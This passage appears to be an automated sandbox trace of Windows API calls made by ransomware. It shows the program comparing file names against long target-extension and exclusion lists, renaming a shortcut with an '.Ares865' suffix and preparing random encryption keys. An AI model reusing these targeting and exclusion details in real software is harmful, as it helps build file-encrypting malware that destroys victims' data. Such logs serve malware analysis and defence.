(lpString1=".lnk", lpString2="kexi") returned -1 [0058.658] lstrlenW (lpString="kexic") returned 5 [0058.658] lstrcmpiW (lpString1="y.lnk", lpString2="kexic") returned 1 [0058.658] lstrlenW (lpString="kexis") returned 5 [0058.658] lstrcmpiW (lpString1="y.lnk", lpString2="kexis") returned 1 [0058.658] lstrlenW (lpString="lgc") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.658] lstrlenW (lpString="lwx") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.658] lstrlenW (lpString="maf") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.658] lstrlenW (lpString="maq") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.658] lstrlenW (lpString="mar") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.658] lstrlenW (lpString="marshal") returned 7 [0058.658] lstrcmpiW (lpString1="ify.lnk", lpString2="marshal") returned -1 [0058.658] lstrlenW (lpString="mas") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.658] lstrlenW (lpString="mav") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.659] lstrlenW (lpString="maw") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.659] lstrlenW (lpString="mdbhtml") returned 7 [0058.659] lstrcmpiW (lpString1="ify.lnk", lpString2="mdbhtml") returned -1 [0058.659] lstrlenW (lpString="mdn") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.659] lstrlenW (lpString="mdt") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.659] lstrlenW (lpString="mfd") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.659] lstrlenW (lpString="mpd") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.659] lstrlenW (lpString="mrg") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.659] lstrlenW (lpString="mud") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.659] lstrlenW (lpString="mwb") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.659] lstrlenW (lpString="myd") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.659] lstrlenW (lpString="ndf") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.659] lstrlenW (lpString="nnt") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.659] lstrlenW (lpString="nrmlib") returned 6 [0058.659] lstrcmpiW (lpString1="fy.lnk", lpString2="nrmlib") returned -1 [0058.659] lstrlenW (lpString="ns2") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.659] lstrlenW (lpString="ns3") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.659] lstrlenW (lpString="ns4") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.659] lstrlenW (lpString="nsf") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.659] lstrlenW (lpString="nv") returned 2 [0058.659] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.659] lstrlenW (lpString="nv2") returned 3 [0058.659] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.660] lstrlenW (lpString="nwdb") returned 4 [0058.660] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.660] lstrlenW (lpString="nyf") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.660] lstrlenW (lpString="odb") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.660] lstrlenW (lpString="odb") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.660] lstrlenW (lpString="oqy") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.660] lstrlenW (lpString="ora") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.660] lstrlenW (lpString="orx") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.660] lstrlenW (lpString="owc") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.660] lstrlenW (lpString="p96") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.660] lstrlenW (lpString="p97") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.660] lstrlenW (lpString="pan") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.660] lstrlenW (lpString="pdb") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.660] lstrlenW (lpString="pdm") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.660] lstrlenW (lpString="pnz") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.660] lstrlenW (lpString="qry") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.660] lstrlenW (lpString="qvd") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.660] lstrlenW (lpString="rbf") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.660] lstrlenW (lpString="rctd") returned 4 [0058.660] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.660] lstrlenW (lpString="rod") returned 3 [0058.660] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.660] lstrlenW (lpString="rodx") returned 4 [0058.661] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.661] lstrlenW (lpString="rpd") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.661] lstrlenW (lpString="rsd") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.661] lstrlenW (lpString="sas7bdat") returned 8 [0058.661] lstrcmpiW (lpString1="nify.lnk", lpString2="sas7bdat") returned -1 [0058.661] lstrlenW (lpString="sbf") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.661] lstrlenW (lpString="scx") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.661] lstrlenW (lpString="sdb") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.661] lstrlenW (lpString="sdc") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.661] lstrlenW (lpString="sdf") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.661] lstrlenW (lpString="sis") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.661] lstrlenW (lpString="spq") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.661] lstrlenW (lpString="te") returned 2 [0058.661] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.661] lstrlenW (lpString="teacher") returned 7 [0058.661] lstrcmpiW (lpString1="ify.lnk", lpString2="teacher") returned -1 [0058.661] lstrlenW (lpString="tmd") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.661] lstrlenW (lpString="tps") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.661] lstrlenW (lpString="trc") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.661] lstrlenW (lpString="trc") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.661] lstrlenW (lpString="trm") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.661] lstrlenW (lpString="udb") returned 3 [0058.661] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.661] lstrlenW (lpString="udl") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.662] lstrlenW (lpString="usr") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.662] lstrlenW (lpString="v12") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.662] lstrlenW (lpString="vis") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.662] lstrlenW (lpString="vpd") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.662] lstrlenW (lpString="vvv") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.662] lstrlenW (lpString="wdb") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.662] lstrlenW (lpString="wmdb") returned 4 [0058.662] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.662] lstrlenW (lpString="wrk") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.662] lstrlenW (lpString="xdb") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.662] lstrlenW (lpString="xld") returned 3 [0058.662] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.662] lstrlenW (lpString="xmlff") returned 5 [0058.662] lstrcmpiW (lpString1="y.lnk", lpString2="xmlff") returned 1 [0058.662] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.Ares865") returned 87 [0058.662] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.ares865"), dwFlags=0x1) returned 1 [0058.663] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.663] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1258) returned 1 [0058.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0058.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.663] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.664] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.664] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.664] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x120 [0058.666] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0058.667] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.668] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.668] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0058.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0058.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.669] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.669] CloseHandle (hObject=0x120) returned 1 [0058.669] CloseHandle (hObject=0x15c) returned 1 [0058.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.670] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b733f17, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b733f17, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Narrator.lnk", cAlternateFileName="")) returned 1 [0058.670] lstrcmpiW (lpString1="Narrator.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.670] lstrcmpiW (lpString1="Narrator.lnk", lpString2="aoldtz.exe") returned 1 [0058.670] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".") returned 1 [0058.670] lstrcmpiW (lpString1="Narrator.lnk", lpString2="..") returned 1 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2="windows") returned -1 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2="bootmgr") returned 1 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2="temp") returned -1 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2="pagefile.sys") returned -1 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2="boot") returned 1 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ids.txt") returned 1 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ntuser.dat") returned -1 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2="perflogs") returned -1 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2="MSBuild") returned 1 [0058.671] lstrlenW (lpString="Narrator.lnk") returned 12 [0058.671] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk") returned 79 [0058.671] lstrcpyW (in: lpString1=0x2cce488, lpString2="Narrator.lnk" | out: lpString1="Narrator.lnk") returned="Narrator.lnk" [0058.671] lstrlenW (lpString="Narrator.lnk") returned 12 [0058.671] lstrlenW (lpString="Ares865") returned 7 [0058.671] lstrcmpiW (lpString1="tor.lnk", lpString2="Ares865") returned 1 [0058.671] lstrlenW (lpString=".dll") returned 4 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".dll") returned 1 [0058.671] lstrlenW (lpString=".lnk") returned 4 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".lnk") returned 1 [0058.671] lstrlenW (lpString=".ini") returned 4 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".ini") returned 1 [0058.671] lstrlenW (lpString=".sys") returned 4 [0058.671] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".sys") returned 1 [0058.671] lstrlenW (lpString="Narrator.lnk") returned 12 [0058.671] lstrlenW (lpString="bak") returned 3 [0058.671] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.671] lstrlenW (lpString="ba_") returned 3 [0058.671] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.671] lstrlenW (lpString="dbb") returned 3 [0058.671] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.671] lstrlenW (lpString="vmdk") returned 4 [0058.671] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.671] lstrlenW (lpString="rar") returned 3 [0058.671] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.671] lstrlenW (lpString="zip") returned 3 [0058.671] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.671] lstrlenW (lpString="tgz") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.672] lstrlenW (lpString="vbox") returned 4 [0058.672] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.672] lstrlenW (lpString="vdi") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.672] lstrlenW (lpString="vhd") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.672] lstrlenW (lpString="vhdx") returned 4 [0058.672] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.672] lstrlenW (lpString="avhd") returned 4 [0058.672] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.672] lstrlenW (lpString="db") returned 2 [0058.672] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.672] lstrlenW (lpString="db2") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.672] lstrlenW (lpString="db3") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.672] lstrlenW (lpString="dbf") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.672] lstrlenW (lpString="mdf") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.672] lstrlenW (lpString="mdb") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.672] lstrlenW (lpString="sql") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.672] lstrlenW (lpString="sqlite") returned 6 [0058.672] lstrcmpiW (lpString1="or.lnk", lpString2="sqlite") returned -1 [0058.672] lstrlenW (lpString="sqlite3") returned 7 [0058.672] lstrcmpiW (lpString1="tor.lnk", lpString2="sqlite3") returned 1 [0058.672] lstrlenW (lpString="sqlitedb") returned 8 [0058.672] lstrcmpiW (lpString1="ator.lnk", lpString2="sqlitedb") returned -1 [0058.672] lstrlenW (lpString="xml") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.672] lstrlenW (lpString="$er") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.672] lstrlenW (lpString="4dd") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.672] lstrlenW (lpString="4dl") returned 3 [0058.672] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.673] lstrlenW (lpString="^^^") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.673] lstrlenW (lpString="abs") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.673] lstrlenW (lpString="abx") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.673] lstrlenW (lpString="accdb") returned 5 [0058.673] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0058.673] lstrlenW (lpString="accdc") returned 5 [0058.673] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0058.673] lstrlenW (lpString="accde") returned 5 [0058.673] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0058.673] lstrlenW (lpString="accdr") returned 5 [0058.673] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0058.673] lstrlenW (lpString="accdt") returned 5 [0058.673] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0058.673] lstrlenW (lpString="accdw") returned 5 [0058.673] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0058.673] lstrlenW (lpString="accft") returned 5 [0058.673] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0058.673] lstrlenW (lpString="adb") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.673] lstrlenW (lpString="adb") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.673] lstrlenW (lpString="ade") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.673] lstrlenW (lpString="adf") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.673] lstrlenW (lpString="adn") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.673] lstrlenW (lpString="adp") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.673] lstrlenW (lpString="alf") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.673] lstrlenW (lpString="ask") returned 3 [0058.673] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.673] lstrlenW (lpString="btr") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.674] lstrlenW (lpString="cat") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.674] lstrlenW (lpString="cdb") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.674] lstrlenW (lpString="ckp") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.674] lstrlenW (lpString="cma") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.674] lstrlenW (lpString="cpd") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.674] lstrlenW (lpString="dacpac") returned 6 [0058.674] lstrcmpiW (lpString1="or.lnk", lpString2="dacpac") returned 1 [0058.674] lstrlenW (lpString="dad") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.674] lstrlenW (lpString="dadiagrams") returned 10 [0058.674] lstrcmpiW (lpString1="rrator.lnk", lpString2="dadiagrams") returned 1 [0058.674] lstrlenW (lpString="daschema") returned 8 [0058.674] lstrcmpiW (lpString1="ator.lnk", lpString2="daschema") returned -1 [0058.674] lstrlenW (lpString="db-journal") returned 10 [0058.674] lstrcmpiW (lpString1="rrator.lnk", lpString2="db-journal") returned 1 [0058.674] lstrlenW (lpString="db-shm") returned 6 [0058.674] lstrcmpiW (lpString1="or.lnk", lpString2="db-shm") returned 1 [0058.674] lstrlenW (lpString="db-wal") returned 6 [0058.674] lstrcmpiW (lpString1="or.lnk", lpString2="db-wal") returned 1 [0058.674] lstrlenW (lpString="dbc") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.674] lstrlenW (lpString="dbs") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.674] lstrlenW (lpString="dbt") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.674] lstrlenW (lpString="dbv") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.674] lstrlenW (lpString="dbx") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.674] lstrlenW (lpString="dcb") returned 3 [0058.674] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.675] lstrlenW (lpString="dct") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.675] lstrlenW (lpString="dcx") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.675] lstrlenW (lpString="ddl") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.675] lstrlenW (lpString="dlis") returned 4 [0058.675] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.675] lstrlenW (lpString="dp1") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.675] lstrlenW (lpString="dqy") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.675] lstrlenW (lpString="dsk") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.675] lstrlenW (lpString="dsn") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.675] lstrlenW (lpString="dtsx") returned 4 [0058.675] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.675] lstrlenW (lpString="dxl") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.675] lstrlenW (lpString="eco") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.675] lstrlenW (lpString="ecx") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.675] lstrlenW (lpString="edb") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.675] lstrlenW (lpString="epim") returned 4 [0058.675] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.675] lstrlenW (lpString="fcd") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.675] lstrlenW (lpString="fdb") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.675] lstrlenW (lpString="fic") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.675] lstrlenW (lpString="flexolibrary") returned 12 [0058.675] lstrlenW (lpString="fm5") returned 3 [0058.675] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.676] lstrlenW (lpString="fmp") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.676] lstrlenW (lpString="fmp12") returned 5 [0058.676] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0058.676] lstrlenW (lpString="fmpsl") returned 5 [0058.676] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0058.676] lstrlenW (lpString="fol") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.676] lstrlenW (lpString="fp3") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.676] lstrlenW (lpString="fp4") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.676] lstrlenW (lpString="fp5") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.676] lstrlenW (lpString="fp7") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.676] lstrlenW (lpString="fpt") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.676] lstrlenW (lpString="frm") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.676] lstrlenW (lpString="gdb") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.676] lstrlenW (lpString="gdb") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.676] lstrlenW (lpString="grdb") returned 4 [0058.676] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.676] lstrlenW (lpString="gwi") returned 3 